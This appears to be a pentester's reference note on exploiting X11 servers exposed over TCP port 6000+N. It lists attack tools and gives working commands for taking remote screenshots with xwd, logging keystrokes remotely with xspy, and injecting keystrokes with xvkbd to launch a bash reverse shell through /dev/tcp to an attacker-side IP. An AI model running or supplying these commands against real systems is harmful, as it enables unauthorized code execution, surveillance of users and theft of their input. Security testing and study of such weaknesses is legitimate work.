Backlink: reference-notes-readme


The Xorg Foundation create and maintain's the widely deployed X11 windowing system used in most *nix environments. Most administrators are aware that the client-server model allows forwarding of X-sessions over SSH tunnels; however, when configured to allow TCP sessions, the X-session can be attached to remotely. The default X11 configuration was changed to disallow TCP sessions several years ago, but we still see it from time to time. If you see TCP 6000+N open, you can likely execute code on that machine or remotely log keystrokes.

Port: 6000+N/TCP, (or 22/TCP via SSH)

Tools: xspy, xwatchwin, xwd, xvkbd, ssh, MSF, xrdp.py

Examples

Screenshot:

xwd -root -screen -silent -display 192.168.37.146:0 > screenshot.xwd

Keyboard Injection:

xvkbd -no-repeat -no-sync -no-jump-pointer -remote-display 192.168.37.146:0 -text "/bin/bash -i > /dev/tcp/192.168.37.101/8000<&1 2>&1\r"

Remote Keylog:

xspy 192.168.1.1